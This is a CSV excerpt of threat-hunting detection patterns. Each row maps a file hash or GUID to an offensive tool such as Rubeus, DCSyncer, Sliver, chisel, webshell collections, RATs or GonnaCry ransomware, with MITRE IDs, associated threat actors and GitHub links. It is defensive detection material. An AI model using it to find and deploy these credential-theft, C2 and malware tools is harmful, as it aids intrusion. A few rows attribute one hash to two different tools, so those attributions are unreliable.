"*e8bba4503b2e26b62002980969dc7a3d1dbe1699c4ce054929692704600b33ba*",".{0,1000}e8bba4503b2e26b62002980969dc7a3d1dbe1699c4ce054929692704600b33ba.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","42355"
"*e8bcea5769f7121a256a8d690d1eeae2a6040af90d7d97fccfc0379c241df060*",".{0,1000}e8bcea5769f7121a256a8d690d1eeae2a6040af90d7d97fccfc0379c241df060.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","42356"
"*e8be0cc95ad642e83a961dc485a62aa6938b5974bbb205d1fdaec72fef860e58*",".{0,1000}e8be0cc95ad642e83a961dc485a62aa6938b5974bbb205d1fdaec72fef860e58.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","42357"
"*e8c419d7176ad443676893924e1a1c0871bda59e512297b9b5846bebe9568b56*",".{0,1000}e8c419d7176ad443676893924e1a1c0871bda59e512297b9b5846bebe9568b56.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42358"
"*e8c42b6656710ed22955acf7a112ba19b6f4ccd8c6fd195f9133539eeb1aa692*",".{0,1000}e8c42b6656710ed22955acf7a112ba19b6f4ccd8c6fd195f9133539eeb1aa692.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","42359"
"*e8c954604c706d3a252049c1e639abf09fb55b90f97b1957895063b6fb8309d3*",".{0,1000}e8c954604c706d3a252049c1e639abf09fb55b90f97b1957895063b6fb8309d3.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42361"
"*E8CA6917-CB06-4128-96CD-59676731B24A*",".{0,1000}E8CA6917\-CB06\-4128\-96CD\-59676731B24A.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","#GUIDProject","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","42362"
"*e8cba96e827c21f74919a949d5e149849b05de37a9892b61a31019f540eb24a4*",".{0,1000}e8cba96e827c21f74919a949d5e149849b05de37a9892b61a31019f540eb24a4.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42363"
"*e8d08184a9c9b9f5b4263107fa19cfad2735f161dd2b16670ee8f68943fda2cf*",".{0,1000}e8d08184a9c9b9f5b4263107fa19cfad2735f161dd2b16670ee8f68943fda2cf.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","42364"
"*e8d4f270bb109e0a3930dc3bf3413d8d071d283c19054809057fb9560f4daa44*",".{0,1000}e8d4f270bb109e0a3930dc3bf3413d8d071d283c19054809057fb9560f4daa44.{0,1000}","offensive_tool_keyword","Bat-Potato","Automating Juicy Potato Local Privilege Escalation CMD exploit for penetration testers","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/0x4xel/Bat-Potato","1","0","#filehash","N/A","10","1","42","11","2022-12-13T20:19:51Z","2022-12-12T20:50:22Z","42365"
"*e8dc7a34e869e6e7858a02be0ca8f799a4c5c411e4297c6df0687157bd3093fc*",".{0,1000}e8dc7a34e869e6e7858a02be0ca8f799a4c5c411e4297c6df0687157bd3093fc.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","42366"
"*e8ddad70f68375dbf38d0e8550acf1e53f5382e0bf9a0ee8f02f8b1c6222db81*",".{0,1000}e8ddad70f68375dbf38d0e8550acf1e53f5382e0bf9a0ee8f02f8b1c6222db81.{0,1000}","offensive_tool_keyword","Rubeus","Run Rubeus via Rundll32 (potential application whitelisting bypass technique)","T1558.004 - T1098 - T1110.001 - T1555.003 - T1218.011 - T1085 - T1070.004","TA0005 - TA0002 - TA0006 - TA0008 - TA0009","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/rvrsh3ll/Rubeus-Rundll32","1","0","#filehash","N/A","10","3","200","32","2020-04-25T19:55:27Z","2020-04-24T20:35:38Z","42367"
"*e8de489a84256609ac4e2b5236737d953af63fed9601d3f69253a5f199d901fc*",".{0,1000}e8de489a84256609ac4e2b5236737d953af63fed9601d3f69253a5f199d901fc.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42368"
"*e8e43ef253fac38fa05323b327609c182bb1b5342d340301424deeaf1bd26673*",".{0,1000}e8e43ef253fac38fa05323b327609c182bb1b5342d340301424deeaf1bd26673.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","42370"
"*e8e5705168a9c66d1a4cf17d3ef2928b9141bffa3ca28a0482536e7900975a87*",".{0,1000}e8e5705168a9c66d1a4cf17d3ef2928b9141bffa3ca28a0482536e7900975a87.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","42371"
"*e8eb686267d1017f0c044f8725a91d2a3b0111156975f4918c9b3839b571483f*",".{0,1000}e8eb686267d1017f0c044f8725a91d2a3b0111156975f4918c9b3839b571483f.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","42374"
"*e8f8b9e708015321f0a7be88076f0e92c7215d2d93765349c34cfe599d135b6c*",".{0,1000}e8f8b9e708015321f0a7be88076f0e92c7215d2d93765349c34cfe599d135b6c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42376"
"*e8fa4ebebd818555956378e99e7cf03fe694f105e45c4531824166d7689997f4*",".{0,1000}e8fa4ebebd818555956378e99e7cf03fe694f105e45c4531824166d7689997f4.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source informations stealer in rust","T1003 - T1083 - T1114 - T1074","TA0006 - TA0009 - TA0005","N/A","N/A","Credential Access","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","#filehash","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","42377"
"*e8fbec25db4f9d95b5e8f41cca51a4b32be8674a4dea7a45b6f7aeb22dbc38db*",".{0,1000}e8fbec25db4f9d95b5e8f41cca51a4b32be8674a4dea7a45b6f7aeb22dbc38db.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","#filehash","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","42378"
"*e8fbec25db4f9d95b5e8f41cca51a4b32be8674a4dea7a45b6f7aeb22dbc38db*",".{0,1000}e8fbec25db4f9d95b5e8f41cca51a4b32be8674a4dea7a45b6f7aeb22dbc38db.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","#filehash","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","42379"
"*e8fbec25db4f9d95b5e8f41cca51a4b32be8674a4dea7a45b6f7aeb22dbc38db*",".{0,1000}e8fbec25db4f9d95b5e8f41cca51a4b32be8674a4dea7a45b6f7aeb22dbc38db.{0,1000}","offensive_tool_keyword","Bat-Potato","Automating Juicy Potato Local Privilege Escalation CMD exploit for penetration testers","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/0x4xel/Bat-Potato","1","0","#filehash","N/A","10","1","42","11","2022-12-13T20:19:51Z","2022-12-12T20:50:22Z","42380"
"*e9073493a75df11850c5f3e6738b108c831ed0346bd6b9c5e5cd18e4bd4d645e*",".{0,1000}e9073493a75df11850c5f3e6738b108c831ed0346bd6b9c5e5cd18e4bd4d645e.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","42382"
"*E9172085-1595-4E98-ABF8-E890D2489BB5*",".{0,1000}E9172085\-1595\-4E98\-ABF8\-E890D2489BB5.{0,1000}","offensive_tool_keyword","GlobalUnProtect","Decrypt GlobalProtect configuration and cookie files.","T1552 - T1003 - T1555","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/rotarydrone/GlobalUnProtect","1","0","#GUIDproject","N/A","9","2","147","19","2024-09-10T20:19:24Z","2024-09-04T15:31:52Z","42384"
"*e91d6dca160c284f21b663cac5aae2f4afd9ce45e8abacb517fa34fc42e754a1*",".{0,1000}e91d6dca160c284f21b663cac5aae2f4afd9ce45e8abacb517fa34fc42e754a1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42385"
"*e91f4e67f48ea790700ec6c55be53c6d2ceb6dd091de3de5074d559cfdfdf02e*",".{0,1000}e91f4e67f48ea790700ec6c55be53c6d2ceb6dd091de3de5074d559cfdfdf02e.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","42386"
"*e91f8a229b999a3a09389cddbdc7288de7b1905f8b69dc48a59e8249938eb82f*",".{0,1000}e91f8a229b999a3a09389cddbdc7288de7b1905f8b69dc48a59e8249938eb82f.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#filehash","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","42387"
"*e920909e0910ab0c7aaf3e402f997d6e05e3a843ef9504b2c97389e76cb38e76*",".{0,1000}e920909e0910ab0c7aaf3e402f997d6e05e3a843ef9504b2c97389e76cb38e76.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","42388"
"*e9255f6726a695cab4ecf9d7ac34c1dd5dde9ac55a3289892a43ee7869e2a0f1*",".{0,1000}e9255f6726a695cab4ecf9d7ac34c1dd5dde9ac55a3289892a43ee7869e2a0f1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","42390"
"*e92707537fe99713752f3d3f479fa68a0c8dd80439c13a2bb4ebb36a952b63fd*",".{0,1000}e92707537fe99713752f3d3f479fa68a0c8dd80439c13a2bb4ebb36a952b63fd.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","#filehash","N/A","10","","N/A","","","","42391"
"*e92d814a584ef1960b96cd7483babd6e74a49563ee2b55955ee5fed98687993a*",".{0,1000}e92d814a584ef1960b96cd7483babd6e74a49563ee2b55955ee5fed98687993a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42393"
"*e94a8fed78081e5ea7157fdbc2828cef104abd248d285f48e4715a994a83ac76*",".{0,1000}e94a8fed78081e5ea7157fdbc2828cef104abd248d285f48e4715a994a83ac76.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42394"
"*e94c155441d49eaa70f62dfd39216a300593eb5fa502022be4c1059c02ca9712*",".{0,1000}e94c155441d49eaa70f62dfd39216a300593eb5fa502022be4c1059c02ca9712.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42395"
"*e94c578a73298e4f6dbb5b3cb4cf4adcea54f6a971e88428f651cd555e5932b0*",".{0,1000}e94c578a73298e4f6dbb5b3cb4cf4adcea54f6a971e88428f651cd555e5932b0.{0,1000}","offensive_tool_keyword","DCSyncer","Perform DCSync operation","T1003.006","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/notsoshant/DCSyncer","1","0","#filehash","N/A","10","2","143","22","2024-11-05T20:03:27Z","2020-06-06T17:20:22Z","42396"
"*e94cb3644275a5675abf5146e368ec04147570db966781014bf320c921ccbfd2*",".{0,1000}e94cb3644275a5675abf5146e368ec04147570db966781014bf320c921ccbfd2.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","42397"
"*e953e1f2e64f00273fe92e24d434d7a6619bb873d43bef5dd330d42de591dc8d*",".{0,1000}e953e1f2e64f00273fe92e24d434d7a6619bb873d43bef5dd330d42de591dc8d.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","#filehash","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","42399"
"*e954e3675ef895c2a316f74b5801d9966597c35bf728020add026fc9e56473e6*",".{0,1000}e954e3675ef895c2a316f74b5801d9966597c35bf728020add026fc9e56473e6.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","42400"
"*e95cf71f61072940249aa53e3816205ba0ad7d5fe5611344bbecfc83f9e6f86a*",".{0,1000}e95cf71f61072940249aa53e3816205ba0ad7d5fe5611344bbecfc83f9e6f86a.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","42401"
"*e95eb9af49be9d5c4c95a832bd36c192a570f0dd649cfd24b81de5e3e6262236*",".{0,1000}e95eb9af49be9d5c4c95a832bd36c192a570f0dd649cfd24b81de5e3e6262236.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#filehash","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","42402"
"*e96e826e534e4ed95244cfdb1147d13b3805c46468be98ed540be2fab68d586d*",".{0,1000}e96e826e534e4ed95244cfdb1147d13b3805c46468be98ed540be2fab68d586d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","42405"
"*e9711f47cf9171f79bf34b342279f6fd9275c8ae65f3eb2c6ebb0b8432ea14f8*",".{0,1000}e9711f47cf9171f79bf34b342279f6fd9275c8ae65f3eb2c6ebb0b8432ea14f8.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","42406"
"*e9711f47cf9171f79bf34b342279f6fd9275c8ae65f3eb2c6ebb0b8432ea14f8*",".{0,1000}e9711f47cf9171f79bf34b342279f6fd9275c8ae65f3eb2c6ebb0b8432ea14f8.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","#filehash","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","42407"
"*e977ee0a5a2f0063f34b0b744b0753e65990e9467843b0dec3c281a6d4a2e009*",".{0,1000}e977ee0a5a2f0063f34b0b744b0753e65990e9467843b0dec3c281a6d4a2e009.{0,1000}","offensive_tool_keyword","Dirty-Vanity","injection technique abusing windows fork API to evade EDRs","T1055 - T1562 - T1070 - T1027","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/Dirty-Vanity","1","0","#filehash","N/A","10","7","633","86","2022-12-23T10:54:10Z","2022-11-24T10:54:00Z","42408"
"*e97965976cb84019118fee8e28bf175735ed5f65de3c4227bd03ffadb2646d50*",".{0,1000}e97965976cb84019118fee8e28bf175735ed5f65de3c4227bd03ffadb2646d50.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42409"
"*e97d6c8f6d2fc73bceefac93fdfa2c4724a68e58b26e4c2631e78580f2722d2a*",".{0,1000}e97d6c8f6d2fc73bceefac93fdfa2c4724a68e58b26e4c2631e78580f2722d2a.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","42410"
